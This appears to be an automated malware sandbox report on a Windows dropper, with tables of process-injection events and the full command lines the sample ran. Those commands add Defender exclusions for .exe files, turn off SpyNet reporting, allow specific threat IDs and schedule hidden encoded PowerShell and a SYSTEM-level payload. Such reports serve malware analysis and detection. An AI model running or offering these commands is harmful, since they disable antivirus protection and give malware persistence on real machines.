N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A
N/A | N/A | C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2240 wrote to memory of 2176 | N/A | C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe
PID 2240 wrote to memory of 2176 | N/A | C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe
PID 2240 wrote to memory of 2176 | N/A | C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe
PID 2176 wrote to memory of 2272 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | C:\Windows\SysWOW64\forfiles.exe
PID 2176 wrote to memory of 2272 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | C:\Windows\SysWOW64\forfiles.exe
PID 2176 wrote to memory of 2272 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | C:\Windows\SysWOW64\forfiles.exe
PID 2176 wrote to memory of 2944 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | C:\Windows\SysWOW64\forfiles.exe
PID 2176 wrote to memory of 2944 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | C:\Windows\SysWOW64\forfiles.exe
PID 2176 wrote to memory of 2944 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | C:\Windows\SysWOW64\forfiles.exe
PID 2944 wrote to memory of 1200 | N/A | C:\Windows\SysWOW64\forfiles.exe | C:\Windows\SysWOW64\cmd.exe
PID 2944 wrote to memory of 1200 | N/A | C:\Windows\SysWOW64\forfiles.exe | C:\Windows\SysWOW64\cmd.exe
PID 2272 wrote to memory of 5020 | N/A | C:\Windows\SysWOW64\forfiles.exe | C:\Windows\SysWOW64\cmd.exe
PID 2944 wrote to memory of 1200 | N/A | C:\Windows\SysWOW64\forfiles.exe | C:\Windows\SysWOW64\cmd.exe
PID 2272 wrote to memory of 5020 | N/A | C:\Windows\SysWOW64\forfiles.exe | C:\Windows\SysWOW64\cmd.exe
PID 2272 wrote to memory of 5020 | N/A | C:\Windows\SysWOW64\forfiles.exe | C:\Windows\SysWOW64\cmd.exe
PID 1200 wrote to memory of 2872 | N/A | C:\Windows\SysWOW64\cmd.exe | \??\c:\windows\SysWOW64\reg.exe
PID 1200 wrote to memory of 2872 | N/A | C:\Windows\SysWOW64\cmd.exe | \??\c:\windows\SysWOW64\reg.exe
PID 1200 wrote to memory of 2872 | N/A | C:\Windows\SysWOW64\cmd.exe | \??\c:\windows\SysWOW64\reg.exe
PID 5020 wrote to memory of 1012 | N/A | C:\Windows\SysWOW64\cmd.exe | \??\c:\windows\SysWOW64\reg.exe
PID 5020 wrote to memory of 1012 | N/A | C:\Windows\SysWOW64\cmd.exe | \??\c:\windows\SysWOW64\reg.exe
PID 5020 wrote to memory of 1012 | N/A | C:\Windows\SysWOW64\cmd.exe | \??\c:\windows\SysWOW64\reg.exe
PID 1200 wrote to memory of 224 | N/A | C:\Windows\SysWOW64\cmd.exe | \??\c:\windows\SysWOW64\reg.exe
PID 1200 wrote to memory of 224 | N/A | C:\Windows\SysWOW64\cmd.exe | \??\c:\windows\SysWOW64\reg.exe
PID 1200 wrote to memory of 224 | N/A | C:\Windows\SysWOW64\cmd.exe | \??\c:\windows\SysWOW64\reg.exe
PID 5020 wrote to memory of 3344 | N/A | C:\Windows\SysWOW64\cmd.exe | \??\c:\windows\SysWOW64\reg.exe
PID 5020 wrote to memory of 3344 | N/A | C:\Windows\SysWOW64\cmd.exe | \??\c:\windows\SysWOW64\reg.exe
PID 5020 wrote to memory of 3344 | N/A | C:\Windows\SysWOW64\cmd.exe | \??\c:\windows\SysWOW64\reg.exe
PID 2176 wrote to memory of 3336 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2176 wrote to memory of 3336 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2176 wrote to memory of 3336 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2176 wrote to memory of 1476 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2176 wrote to memory of 1476 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2176 wrote to memory of 1476 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | C:\Windows\SysWOW64\schtasks.exe
PID 3528 wrote to memory of 2336 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\gpupdate.exe
PID 3528 wrote to memory of 2336 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\gpupdate.exe
PID 2176 wrote to memory of 1876 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2176 wrote to memory of 1876 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2176 wrote to memory of 1876 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2176 wrote to memory of 1476 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2176 wrote to memory of 1476 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2176 wrote to memory of 1476 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2496 wrote to memory of 3944 | N/A | C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\EgorIPt.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2496 wrote to memory of 3944 | N/A | C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\EgorIPt.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2496 wrote to memory of 3944 | N/A | C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\EgorIPt.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3944 wrote to memory of 3680 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 3944 wrote to memory of 3680 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 3944 wrote to memory of 3680 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3680 wrote to memory of 3180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3680 wrote to memory of 3180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3680 wrote to memory of 3180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 2340 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 2340 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 2340 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 3336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 3336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 3336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 3088 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 3088 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 3088 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 4940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 4940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 4940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 1004 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3944 wrote to memory of 1004 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe

"C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe"

C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe

.\Install.exe /zkizdidrXl "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gzPXhdsBX" /SC once /ST 07:09:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gzPXhdsBX"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gzPXhdsBX"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bCAdHbOFiqtMCRhbmR" /SC once /ST 10:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\EgorIPt.exe\" hl /YHsite_idMhh 385118 /S" /V1 /F

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4492 --field-trial-handle=2272,i,17338911640954948469,1637568328132129119,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\EgorIPt.exe

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\EgorIPt.exe hl /YHsite_idMhh 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

